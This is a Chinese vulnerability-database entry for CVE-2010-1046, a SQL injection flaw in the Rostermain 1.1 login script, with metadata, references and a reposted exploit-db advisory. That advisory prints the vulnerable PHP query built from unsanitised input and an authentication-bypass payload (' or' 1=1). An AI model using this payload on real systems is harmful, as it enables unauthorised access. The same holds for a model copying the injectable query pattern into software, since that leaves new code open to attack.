Rostermain 'index.php'多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118978 漏洞类型 SQL注入
发布时间 2010-02-07 更新时间 2010-02-07
CVE编号 CVE-2010-1046 CNNVD-ID CNNVD-201003-293
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/11356
https://www.securityfocus.com/bid/39935
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-293
|漏洞详情
Rostermain的脚本index.php存在多个SQL注入漏洞。远程攻击者可以借助(1)userid(username)和(2)password参数,执行任意的SQL命令。
|漏洞EXP
[+] Rostermain <= 1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/rostermain/


[+] Vuln Code : 

[index.php]

if ($_POST['userid'] && $_POST['password'])
{
  // if the user has just tried to log in
  $logquery = "select * from users "
           ."where username='$userid' "
           ." and passwd='$password' ";

[+] PoC : 

username :  ' or' 1=1
password :  ' or' 1=1
|受影响的产品
Ryan Marshall Rostermain 1.1
|参考资料

来源:VUPEN
名称:ADV-2010-0318
链接:http://www.vupen.com/english/advisories/2010/0318
来源:MISC
链接:http://www.exploit-db.com/exploits/11356
来源:SECUNIA
名称:38440
链接:http://secunia.com/advisories/38440
来源:OSVDB
名称:62162
链接:http://osvdb.org/62162